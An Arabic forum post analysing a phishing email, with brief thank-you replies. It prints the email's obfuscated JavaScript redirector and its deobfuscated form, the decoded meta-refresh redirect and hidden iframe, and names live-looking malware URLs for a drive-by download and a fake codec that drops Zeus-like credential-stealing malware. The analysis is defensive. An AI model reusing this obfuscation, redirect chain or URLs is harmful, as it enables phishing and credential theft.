الاختراق عن طريق البريد لإلكتروني..وجب الحذر..تحليل أمني

[احمد سمير خالد]

السلام عليكم ورحمة الله وبركاته


اليوم بينما كنت اتصفح بريدي الإلكتروني وجدت رسالة على البريد الوارد…الرسالة تطلب مني تحميل ملف مرفق و هو عبارة عن مقال في مستند PDF

للوهلة الأولى ايقنت أن ان الرسالة مجرد فخ يقوم باستهوائي…لسبب بسيط هو انه لا يوجد اي علاقة بيني و بين الجهة المرسلة كما ان شكل العنوان يوحي بان في الموضوع “ان” و أخواتها

كود PHP
---------------------------- Message original
----------------------------
Objet: PDF of JS article
De: "Maude Gorman"
Date: Lun 20 november 2010 21:21
--------------------------------------------------------------------------

see attached.

-V

60488Journal Sentinel - Leka Obit.html




الرسالة لم تعرف على انها سبام في بريد الهوتميل و هذا ما أثار فضولي لمعرفة المزيد

الرسالة في شكل صفحة html قام بريد الهوتميل باخفاء محتواها…قمت بتعطيل الجافا سكربت في متصفحي و فتحت محتوى الصفحة

لأعرف محتواها فوجدت كود جافا سكربت التالي:

كود PHP
<****** language="**********" type="text/**********">function
aavk(u4zc){var
fwag,qsv2="",xsln,cxzm,tkql=":;s\"xn0>uciqb/lo-em=afpv.t
hr<",xtur=tkql.length;eval(unescape("%66un%63ti%6F n
s%30k9%28uy%73e)**%71sv%32+=%75yse%7D"));for(fwag=0 ;fwag<u4zc.length;fwag++){cxzm=u4zc.charAt(fwag);x sln=tkql.indexOf(cxzm);if(xsln>-1){xsln-=(fwag+1)%xtur;if(xsln<0){xsln+=xtur;**s0k9(tkql.ch arAt(xsln));**else{s0k9(cxzm);****eval(unescape("%64o c%75me%6Et.w%72it%65(q%73v2)%3Bqs%762=%22%22;"));** aavk(":aa<tsx\"xsh<.ptc0fe>bai
p<v>ln =u<.c/ceut;iciue;ssqaffo=l\"qif
b.mi;nxrtochp");</******><no******>To display this page you
need a browser that supports **********.</no******>


كما تلاحظون فالكود عادي و ليس به ما يثير الريبة…لكنه مشفر…اذا دعونا نفك تشفيره وإضافة المسافة البادئة المناسبة

بعد فك التشفير حصلت على التالي:
كود PHP
**********
function aavk(u4zc)**
var fwag,qsv2="",xsln,cxzm,tkql=":;s\"xn0>uciqb/lo-em=afpv.t
hr<",xtur=tkql.length;
function s0k9(uyse)**
qsv2+=uyse
**
for(fwag=0;fwag<u4zc.length;fwag++)**
cxzm=u4zc.charAt(fwag);
xsln=tkql.indexOf(cxzm);
if(xsln>-1)**
xsln-=(fwag+1)%xtur;
if(xsln<0)**
xsln+=xtur;
**
s0k9(tkql.charAt(xsln));
**
else{
s0k9(cxzm);
**
**
********.write(qsv2);
qsv2="";
**
aavk(":aa<tsx\"xsh<.ptc0fe>bai p<v>ln
=u<.c/ceut;iciue;ssqaffo=l\"qif b.mi;nxrtochp");
</******><no******>To display this page you need a browser
that supports **********.</no******>


يوجد لدينا الآن دالة رئيسية تحتوي على دالة ثانية تقوم بتحويل السلسة المدخلة الى رمز لتعرض في الأخير كود جافا سكربت مبهم

نقوم بتعديل المستند .write عن طريق ***** لنشاهد الكود الذي يتم تحصيله

كود PHP
<**** **********="*******"
*******="0;url=http://barrhavenbia.ca/x.html" />


اذا كود الجافا سكربت يقوم بتحويلنا الى رابط أول: http://barrhavenbia.ca/x.html به صفحة html غير مشفرة

الصفحة تحتوي على الكود التالي:

كود PHP
PLEASE WAITING.... 4 SECONDS
<****** width="0" height="0"
src="http://finwizonline.com/news/"></******>
<**** **********="*******"
*******="4;url=http://xxxvideo-eyyc.cz.cc/video7/?afid=24" />


قمت بالبحث عن الدومين finwizonline.com في قوقل فكانت النتيجة التالية https://zeustracker.abuse.ch/monitor...72780bbe234546 (تم التبليغ عن الروابط و تم حجبها من قوقل و من فايرفوكس)

تحليل الصفحة يظهر لنا ان رابط الدومين يحتوي على فايروس يحمل تلقائيا على الجهاز عن طريق كود جافا سكربت

الفايروس موجود على المسار التالي /news/exe.exe

قمت بتحميل الفايروس على سطح المكتب و رفعته على موقع virustotal فكانت النتيجة كالتالي:

http://www.virustotal.com/file-scan/report.htm

7 برامج حماية فقط اعتبرت البرنامج كفايروس و البقية لم تتعرف عليه

نمر للرابط الثاني http://xxxvideo-eyyc.cz.cc/video7/?afid=24 – هذا الرابط يحتوي على صفحة تطلب منا تحميل مشغل فيديو مفقود (codec)

نقوم بتحميل الملف على سطح المكتب فنحصل على ملف تنفيذي codec.exe بأيقونة جميلة و كأنه فعلا برنامج كودك

قمت بفحص الملف ايضا عن طريق موقع virustotal فكانت النتيجة التالية:

http://www.virustotal.com/file-scan/report.html

فقط 20 برنامج حماية اكتشف الفايروس

الخطير في الأمر أن برامج جماية مدفوعة مثل McAfee و Symantec لم تتعرف عليه

تحليل موقع Anubis على الرابط التالي http://anubis.iseclab.org/?action=re...4d&format=html

بين لنا ان الملف عبارة عن malware مبرمج لاصطياد البيانات المخزنة على الجهاز مثل معلومات البريد الالكتروني و المسنجر و كلمات المرور المحفوظة بالمتصفح

الفايروس يبدو و كانه فايروس زيوس المعروف

الهجوم اعتمد طريقة التمويه حيث تم عن طريق تحميل برنامجين في رابطين مختلفين يتم التنقل بينهما تلقائيا…فالملفين مترابطين و يعملان معا الملف الاول يقوم بمهاجمة الانتي فايروس و تعطيله في حين ان الملف الثاني يقوم بتسجيل نفسه داخل بروسايس النظام ليعمل تلقائيا بمجرد تشغيلنا

لجهاز الكمبيوتر…ثم يقوم بمراقبة جميع العمليات و تسجيلها و ارسالها لسرفر المهاجم

الفايروس شبيه جدا بعمل تجميعة فايروس زيوس ..لذا دائما وجب علينا الحذر و الشك في كل الملفات و الروابط التي تصلنا على البريد الالكتروني و خاصة عندما تكون من مصادر نجهلها

برامج الحماية ليست هي الحل…فالحل دائما في عقولنا و عيوننا …و على القول..لا تثق في اي شيئ على الانترنت مهما كان و كيف ما كان…

[عمرابوجربوع]

بارك الله فيكم وجزاكم الله خير الجزاء
جعله الله في موازين حسناتكم

[احمد سمير خالد]

واياكم بارك الله فيكم
وجزاكم خيرا
شكرا على مروركم الطيب

[خالد الهنداوي]

جزاكم الله خير ا

[احمد المعاني]

صدقا نحن بحاجة ماسة إلى تفكير ناقد ومتفحص في الاشياء
جزيت الجنة يا أخي ونقول قواك الله على تعلم هذا العلم علم التكنولوجيا أو الهكرز بالاحرى لخدمة المسلمين في كل مكان

[احمد سمير خالد]

اكرمكم الله وزادكم من فضله
شكرا على مروركم الطيب
فى رعاية الله وحفظه